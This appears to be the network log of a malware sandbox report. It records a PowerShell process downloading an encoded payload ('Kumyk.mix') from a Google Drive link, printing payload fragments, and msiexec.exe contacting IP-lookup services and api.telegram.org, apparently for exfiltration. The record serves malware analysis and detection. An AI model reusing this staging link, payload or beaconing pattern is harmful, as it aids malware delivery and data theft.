                                                                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                Oct 10, 2024 09:27:40.920089006 CEST1.1.1.1192.168.2.70x9995No error (0)drive.google.com142.250.186.142A (IP address)IN (0x0001)false
                                                                Oct 10, 2024 09:27:41.976136923 CEST1.1.1.1192.168.2.70x4b6No error (0)drive.usercontent.google.com142.250.185.161A (IP address)IN (0x0001)false
                                                                Oct 10, 2024 09:28:24.244301081 CEST1.1.1.1192.168.2.70x8bd8No error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)false
                                                                Oct 10, 2024 09:28:24.244301081 CEST1.1.1.1192.168.2.70x8bd8No error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)false
                                                                Oct 10, 2024 09:28:24.244301081 CEST1.1.1.1192.168.2.70x8bd8No error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)false
                                                                Oct 10, 2024 09:28:24.244301081 CEST1.1.1.1192.168.2.70x8bd8No error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)false
                                                                Oct 10, 2024 09:28:24.244301081 CEST1.1.1.1192.168.2.70x8bd8No error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)false
                                                                Oct 10, 2024 09:28:24.244301081 CEST1.1.1.1192.168.2.70x8bd8No error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)false
                                                                Oct 10, 2024 09:28:25.439915895 CEST1.1.1.1192.168.2.70x9ec3No error (0)bg.microsoft.map.fastly.net199.232.210.172A (IP address)IN (0x0001)false
                                                                Oct 10, 2024 09:28:25.439915895 CEST1.1.1.1192.168.2.70x9ec3No error (0)bg.microsoft.map.fastly.net199.232.214.172A (IP address)IN (0x0001)false
                                                                Oct 10, 2024 09:28:26.101918936 CEST1.1.1.1192.168.2.70x97deNo error (0)reallyfreegeoip.org188.114.97.3A (IP address)IN (0x0001)false
                                                                Oct 10, 2024 09:28:26.101918936 CEST1.1.1.1192.168.2.70x97deNo error (0)reallyfreegeoip.org188.114.96.3A (IP address)IN (0x0001)false
                                                                Oct 10, 2024 09:28:42.059847116 CEST1.1.1.1192.168.2.70xe8f1No error (0)api.telegram.org149.154.167.220A (IP address)IN (0x0001)false
                                                                • drive.google.com
                                                                • drive.usercontent.google.com
                                                                • reallyfreegeoip.org
                                                                • api.telegram.org
                                                                • checkip.dyndns.org
                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                0192.168.2.749975132.226.8.169804504C:\Windows\SysWOW64\msiexec.exe
                                                                TimestampBytes transferredDirectionData
                                                                Oct 10, 2024 09:28:24.252916098 CEST151OUTGET / HTTP/1.1
                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                Host: checkip.dyndns.org
                                                                Connection: Keep-Alive
                                                                Oct 10, 2024 09:28:25.157804012 CEST272INHTTP/1.1 200 OK
                                                                Date: Thu, 10 Oct 2024 07:28:25 GMT
                                                                Content-Type: text/html
                                                                Content-Length: 103
                                                                Connection: keep-alive
                                                                Cache-Control: no-cache
                                                                Pragma: no-cache
                                                                Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>
                                                                Oct 10, 2024 09:28:25.226861954 CEST127OUTGET / HTTP/1.1
                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                Host: checkip.dyndns.org
                                                                Oct 10, 2024 09:28:25.505796909 CEST272INHTTP/1.1 200 OK
                                                                Date: Thu, 10 Oct 2024 07:28:25 GMT
                                                                Content-Type: text/html
                                                                Content-Length: 103
                                                                Connection: keep-alive
                                                                Cache-Control: no-cache
                                                                Pragma: no-cache
                                                                Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>
                                                                Oct 10, 2024 09:28:27.122829914 CEST127OUTGET / HTTP/1.1
                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                Host: checkip.dyndns.org
                                                                Oct 10, 2024 09:28:27.726967096 CEST272INHTTP/1.1 200 OK
                                                                Date: Thu, 10 Oct 2024 07:28:27 GMT
                                                                Content-Type: text/html
                                                                Content-Length: 103
                                                                Connection: keep-alive
                                                                Cache-Control: no-cache
                                                                Pragma: no-cache
                                                                Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>
                                                                Oct 10, 2024 09:28:27.727226019 CEST272INHTTP/1.1 200 OK
                                                                Date: Thu, 10 Oct 2024 07:28:27 GMT
                                                                Content-Type: text/html
                                                                Content-Length: 103
                                                                Connection: keep-alive
                                                                Cache-Control: no-cache
                                                                Pragma: no-cache
                                                                Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1192.168.2.749981132.226.8.169804504C:\Windows\SysWOW64\msiexec.exe
                                                                TimestampBytes transferredDirectionData
                                                                Oct 10, 2024 09:28:28.340564966 CEST127OUTGET / HTTP/1.1
                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                Host: checkip.dyndns.org
                                                                Oct 10, 2024 09:28:29.279695988 CEST272INHTTP/1.1 200 OK
                                                                Date: Thu, 10 Oct 2024 07:28:29 GMT
                                                                Content-Type: text/html
                                                                Content-Length: 103
                                                                Connection: keep-alive
                                                                Cache-Control: no-cache
                                                                Pragma: no-cache
                                                                Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                2192.168.2.749983132.226.8.169804504C:\Windows\SysWOW64\msiexec.exe
                                                                TimestampBytes transferredDirectionData
                                                                Oct 10, 2024 09:28:30.950964928 CEST151OUTGET / HTTP/1.1
                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                Host: checkip.dyndns.org
                                                                Connection: Keep-Alive
                                                                Oct 10, 2024 09:28:32.038604021 CEST272INHTTP/1.1 200 OK
                                                                Date: Thu, 10 Oct 2024 07:28:31 GMT
                                                                Content-Type: text/html
                                                                Content-Length: 103
                                                                Connection: keep-alive
                                                                Cache-Control: no-cache
                                                                Pragma: no-cache
                                                                Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>
                                                                Oct 10, 2024 09:28:32.252027035 CEST272INHTTP/1.1 200 OK
                                                                Date: Thu, 10 Oct 2024 07:28:31 GMT
                                                                Content-Type: text/html
                                                                Content-Length: 103
                                                                Connection: keep-alive
                                                                Cache-Control: no-cache
                                                                Pragma: no-cache
                                                                Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                3192.168.2.749985132.226.8.169804504C:\Windows\SysWOW64\msiexec.exe
                                                                TimestampBytes transferredDirectionData
                                                                Oct 10, 2024 09:28:32.654583931 CEST151OUTGET / HTTP/1.1
                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                Host: checkip.dyndns.org
                                                                Connection: Keep-Alive
                                                                Oct 10, 2024 09:28:34.426436901 CEST272INHTTP/1.1 200 OK
                                                                Date: Thu, 10 Oct 2024 07:28:34 GMT
                                                                Content-Type: text/html
                                                                Content-Length: 103
                                                                Connection: keep-alive
                                                                Cache-Control: no-cache
                                                                Pragma: no-cache
                                                                Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                4192.168.2.749987132.226.8.169804504C:\Windows\SysWOW64\msiexec.exe
                                                                TimestampBytes transferredDirectionData
                                                                Oct 10, 2024 09:28:35.056756973 CEST151OUTGET / HTTP/1.1
                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                Host: checkip.dyndns.org
                                                                Connection: Keep-Alive
                                                                Oct 10, 2024 09:28:36.165354967 CEST272INHTTP/1.1 200 OK
                                                                Date: Thu, 10 Oct 2024 07:28:36 GMT
                                                                Content-Type: text/html
                                                                Content-Length: 103
                                                                Connection: keep-alive
                                                                Cache-Control: no-cache
                                                                Pragma: no-cache
                                                                Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                5192.168.2.749989132.226.8.169804504C:\Windows\SysWOW64\msiexec.exe
                                                                TimestampBytes transferredDirectionData
                                                                Oct 10, 2024 09:28:36.845266104 CEST151OUTGET / HTTP/1.1
                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                Host: checkip.dyndns.org
                                                                Connection: Keep-Alive
                                                                Oct 10, 2024 09:28:37.648166895 CEST272INHTTP/1.1 200 OK
                                                                Date: Thu, 10 Oct 2024 07:28:37 GMT
                                                                Content-Type: text/html
                                                                Content-Length: 103
                                                                Connection: keep-alive
                                                                Cache-Control: no-cache
                                                                Pragma: no-cache
                                                                Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                6192.168.2.749991132.226.8.169804504C:\Windows\SysWOW64\msiexec.exe
                                                                TimestampBytes transferredDirectionData
                                                                Oct 10, 2024 09:28:38.284524918 CEST151OUTGET / HTTP/1.1
                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                Host: checkip.dyndns.org
                                                                Connection: Keep-Alive
                                                                Oct 10, 2024 09:28:39.127578020 CEST272INHTTP/1.1 200 OK
                                                                Date: Thu, 10 Oct 2024 07:28:38 GMT
                                                                Content-Type: text/html
                                                                Content-Length: 103
                                                                Connection: keep-alive
                                                                Cache-Control: no-cache
                                                                Pragma: no-cache
                                                                Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                7192.168.2.749993132.226.8.169804504C:\Windows\SysWOW64\msiexec.exe
                                                                TimestampBytes transferredDirectionData
                                                                Oct 10, 2024 09:28:39.713779926 CEST151OUTGET / HTTP/1.1
                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                Host: checkip.dyndns.org
                                                                Connection: Keep-Alive
                                                                Oct 10, 2024 09:28:41.414132118 CEST272INHTTP/1.1 200 OK
                                                                Date: Thu, 10 Oct 2024 07:28:41 GMT
                                                                Content-Type: text/html
                                                                Content-Length: 103
                                                                Connection: keep-alive
                                                                Cache-Control: no-cache
                                                                Pragma: no-cache
                                                                Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                0192.168.2.749737142.250.186.1424437620C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                TimestampBytes transferredDirectionData
                                                                2024-10-10 07:27:41 UTC215OUTGET /uc?export=download&id=1vmFR9yduH7B2lOFOQqcZVCVG4wctOCbI HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                Host: drive.google.com
                                                                Connection: Keep-Alive
                                                                2024-10-10 07:27:41 UTC1610INHTTP/1.1 303 See Other
                                                                Content-Type: application/binary
                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                Pragma: no-cache
                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                Date: Thu, 10 Oct 2024 07:27:41 GMT
                                                                Location: https://drive.usercontent.google.com/download?id=1vmFR9yduH7B2lOFOQqcZVCVG4wctOCbI&export=download
                                                                Strict-Transport-Security: max-age=31536000
                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                Content-Security-Policy: script-src 'nonce-C--OqeqzbYARSFcwWEDC0g' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                Cross-Origin-Opener-Policy: same-origin
                                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                Server: ESF
                                                                Content-Length: 0
                                                                X-XSS-Protection: 0
                                                                X-Frame-Options: SAMEORIGIN
                                                                X-Content-Type-Options: nosniff
                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                Connection: close


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1192.168.2.749747142.250.185.1614437620C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                TimestampBytes transferredDirectionData
                                                                2024-10-10 07:27:42 UTC233OUTGET /download?id=1vmFR9yduH7B2lOFOQqcZVCVG4wctOCbI&export=download HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                Host: drive.usercontent.google.com
                                                                Connection: Keep-Alive
                                                                2024-10-10 07:27:45 UTC4889INHTTP/1.1 200 OK
                                                                Content-Type: application/octet-stream
                                                                Content-Security-Policy: sandbox
                                                                Content-Security-Policy: default-src 'none'
                                                                Content-Security-Policy: frame-ancestors 'none'
                                                                X-Content-Security-Policy: sandbox
                                                                Cross-Origin-Opener-Policy: same-origin
                                                                Cross-Origin-Embedder-Policy: require-corp
                                                                Cross-Origin-Resource-Policy: same-site
                                                                X-Content-Type-Options: nosniff
                                                                Content-Disposition: attachment; filename="Kumyk.mix"
                                                                Access-Control-Allow-Origin: *
                                                                Access-Control-Allow-Credentials: false
                                                                Access-Control-Allow-Headers: Accept, Accept-Language, Authorization, Cache-Control, Content-Disposition, Content-Encoding, Content-Language, Content-Length, Content-MD5, Content-Range, Content-Type, Date, developer-token, financial-institution-id, X-Goog-Sn-Metadata, X-Goog-Sn-PatientId, GData-Version, google-cloud-resource-prefix, linked-customer-id, login-customer-id, x-goog-request-params, Host, If-Match, If-Modified-Since, If-None-Match, If-Unmodified-Since, Origin, OriginToken, Pragma, Range, request-id, Slug, Transfer-Encoding, hotrod-board-name, hotrod-chrome-cpu-model, hotrod-chrome-processors, Want-Digest, X-Ad-Manager-Impersonation, x-chrome-connected, X-ClientDetails, X-Client-Pctx, X-Client-Version, x-debug-settings-metadata, X-Firebase-Locale, X-Goog-Firebase-Installations-Auth, X-Firebase-Client, X-Firebase-Client-Log-Type, X-Firebase-GMPID, X-Firebase-Auth-Token, X-Firebase-AppCheck, X-Firebase-Token, X-Goog-Drive-Client-Version, X-Goog-Drive-Resource-Keys, X-GData-Client, X-GData-Key, X-GoogA [TRUNCATED]
                                                                Access-Control-Allow-Methods: GET,HEAD,OPTIONS
                                                                Accept-Ranges: bytes
                                                                Content-Length: 468648
                                                                Last-Modified: Thu, 10 Oct 2024 02:21:15 GMT
                                                                X-GUploader-UploadID: AHmUCY156XYBz6QTQ0zdz04aQfyorU7kaNuqJYXJANYbDNovFnB-Q1fAWj1oy9mA2pMkzTj8EMDRNp-sBA
                                                                Date: Thu, 10 Oct 2024 07:27:44 GMT
                                                                Expires: Thu, 10 Oct 2024 07:27:44 GMT
                                                                Cache-Control: private, max-age=0
                                                                X-Goog-Hash: crc32c=eqAn4Q==
                                                                Server: UploadServer
                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                Connection: close
                                                                2024-10-10 07:27:45 UTC4889INData Raw: 36 77 4c 34 4a 2b 73 43 68 79 69 37 78 5a 51 58 41 48 45 42 6d 2b 73 43 6b 37 30 44 58 43 51 45 63 51 47 62 63 51 47 62 75 62 67 41 6f 45 31 78 41 5a 76 72 41 75 46 79 67 66 45 70 67 61 6e 58 36 77 4c 51 79 65 73 43 4e 41 53 42 77 57 39 2b 39 6d 58 72 41 73 2f 30 63 51 47 62 36 77 4c 6e 6f 48 45 42 6d 37 72 44 5a 74 54 6c 36 77 49 49 36 6e 45 42 6d 2b 73 43 31 59 31 78 41 5a 73 78 79 6e 45 42 6d 33 45 42 6d 34 6b 55 43 2b 73 43 75 30 68 78 41 5a 76 52 34 6e 45 42 6d 2b 73 43 73 6a 4b 44 77 51 52 78 41 5a 74 78 41 5a 75 42 2b 66 73 4e 4d 41 52 38 7a 58 45 42 6d 2b 73 43 6d 6c 71 4c 52 43 51 45 63 51 47 62 63 51 47 62 69 63 4e 78 41 5a 76 72 41 6e 63 78 67 63 4f 6a 32 4a 34 44 36 77 4c 6b 59 75 73 43 46 64 53 36 64 57 46 4c 2f 58 45 42 6d 2b 73 43 47 45 4f
                                                                Data Ascii: 6wL4J+sChyi7xZQXAHEBm+sCk70DXCQEcQGbcQGbubgAoE1xAZvrAuFygfEpganX6wLQyesCNASBwW9+9mXrAs/0cQGb6wLnoHEBm7rDZtTl6wII6nEBm+sC1Y1xAZsxynEBm3EBm4kUC+sCu0hxAZvR4nEBm+sCsjKDwQRxAZtxAZuB+fsNMAR8zXEBm+sCmlqLRCQEcQGbcQGbicNxAZvrAncxgcOj2J4D6wLkYusCFdS6dWFL/XEBm+sCGEO
                                                                2024-10-10 07:27:45 UTC4889INData Raw: 77 70 45 4b 44 73 61 59 45 44 5a 2f 32 65 61 52 77 4b 4d 7a 4b 79 62 57 43 59 31 76 77 69 4e 4c 2f 4d 66 47 37 34 76 7a 2f 49 33 4f 6a 6a 6e 55 78 67 4e 49 50 4f 50 6f 4c 58 53 6a 4f 53 61 6d 36 65 54 6a 30 42 44 74 4d 37 64 74 48 33 42 47 6f 75 33 77 52 71 4c 74 38 45 61 69 37 66 42 47 6f 75 33 77 52 71 68 6d 71 34 6e 79 43 2f 6a 4c 4f 56 36 57 59 63 64 65 50 35 57 4b 36 6c 6c 70 68 4b 33 44 6d 55 4b 6d 2b 55 64 4e 56 30 6b 46 59 76 69 77 52 71 4c 74 38 45 61 69 37 66 42 47 6f 75 33 77 52 71 4c 74 38 45 61 69 35 59 5a 56 43 39 66 33 64 52 41 50 76 66 42 74 6f 7a 74 6f 51 71 7a 35 51 67 68 37 6e 52 79 66 6e 47 35 4b 64 6f 4f 4c 56 6e 64 34 55 44 7a 2b 62 75 4f 55 77 70 47 2b 64 4e 78 2b 6b 44 72 2f 67 61 47 30 41 70 47 39 6c 51 78 50 5a 4f 47 41 6c 58 41
                                                                Data Ascii: wpEKDsaYEDZ/2eaRwKMzKybWCY1vwiNL/MfG74vz/I3OjjnUxgNIPOPoLXSjOSam6eTj0BDtM7dtH3BGou3wRqLt8Eai7fBGou3wRqhmq4nyC/jLOV6WYcdeP5WK6llphK3DmUKm+UdNV0kFYviwRqLt8Eai7fBGou3wRqLt8Eai5YZVC9f3dRAPvfBtoztoQqz5Qgh7nRyfnG5KdoOLVnd4UDz+buOUwpG+dNx+kDr/gaG0ApG9lQxPZOGAlXA
                                                                2024-10-10 07:27:45 UTC32INData Raw: 63 41 6a 79 39 70 4c 74 62 75 74 73 30 36 57 41 61 64 43 38 79 41 4c 36 76 31 62 41 4a 38 35 56
                                                                Data Ascii: cAjy9pLtbuts06WAadC8yAL6v1bAJ85V
                                                                2024-10-10 07:27:45 UTC1322INData Raw: 68 49 77 56 78 67 43 2f 42 4d 79 33 56 62 68 30 50 70 45 38 64 50 4f 6c 33 6d 51 43 36 76 37 61 63 45 59 72 6a 41 41 6f 4f 33 77 52 71 4c 74 38 45 61 69 37 66 42 47 6f 75 33 77 52 71 4c 74 38 45 76 5a 6f 6c 71 68 49 4d 4a 47 6c 67 7a 51 37 2b 70 54 4a 67 41 70 66 4b 48 7a 46 57 6f 36 68 4b 6b 42 69 39 41 4c 71 2b 37 54 35 63 71 4e 76 55 2b 6a 45 54 6d 79 74 30 4a 78 46 33 65 32 6b 44 63 50 57 31 6f 34 77 70 5a 65 6a 70 30 30 5a 43 47 41 6c 62 49 4b 78 59 79 4d 32 47 54 36 39 48 56 42 45 50 2f 52 61 2f 54 5a 69 6d 65 62 39 36 49 4a 33 63 38 35 53 71 57 32 46 53 7a 65 51 34 6e 57 73 37 6d 34 49 6b 4e 72 77 6a 74 4d 68 68 44 33 51 6e 49 79 6c 2b 33 51 4f 51 45 74 38 45 61 68 44 76 38 72 49 2b 33 6e 30 54 64 43 66 37 45 43 5a 42 41 39 45 78 71 75 38 51 4b 51
                                                                Data Ascii: hIwVxgC/BMy3Vbh0PpE8dPOl3mQC6v7acEYrjAAoO3wRqLt8Eai7fBGou3wRqLt8EvZolqhIMJGlgzQ7+pTJgApfKHzFWo6hKkBi9ALq+7T5cqNvU+jETmyt0JxF3e2kDcPW1o4wpZejp00ZCGAlbIKxYyM2GT69HVBEP/Ra/TZimeb96IJ3c85SqW2FSzeQ4nWs7m4IkNrwjtMhhD3QnIyl+3QOQEt8EahDv8rI+3n0TdCf7ECZBA9Exqu8QKQ
                                                                2024-10-10 07:27:45 UTC1390INData Raw: 68 4e 70 2f 44 30 44 72 67 30 6a 72 4d 77 70 47 56 4a 4a 56 32 45 44 62 2b 6c 67 2b 47 77 4b 47 7a 48 75 2b 63 73 76 61 6e 31 79 32 48 71 6f 73 57 76 52 72 34 79 32 42 32 6d 50 6a 5a 4b 55 70 73 4b 35 45 4d 6c 30 6e 7a 64 70 4b 57 79 70 55 6d 4a 4d 4f 78 38 41 61 69 33 76 6e 49 50 44 70 5a 76 79 48 70 4a 30 73 4b 2f 32 35 74 39 64 6f 6c 68 69 71 74 44 6b 45 72 41 44 56 31 71 61 4c 4e 70 37 68 79 55 6b 4c 4c 73 73 6f 54 48 69 59 53 56 6d 6e 30 58 51 55 57 71 52 4b 58 38 2f 68 66 32 7a 45 48 51 47 62 66 62 71 4a 63 72 73 32 4c 7a 75 56 56 38 71 62 66 63 4d 54 2b 32 38 2b 31 39 52 35 46 50 32 6b 32 7a 50 44 51 32 68 59 31 61 70 57 76 36 62 30 49 6d 45 37 4b 74 61 4b 54 49 37 6e 41 31 4f 50 69 7a 69 75 47 37 4c 61 47 55 51 48 50 6b 58 31 49 71 76 32 44 6b 48
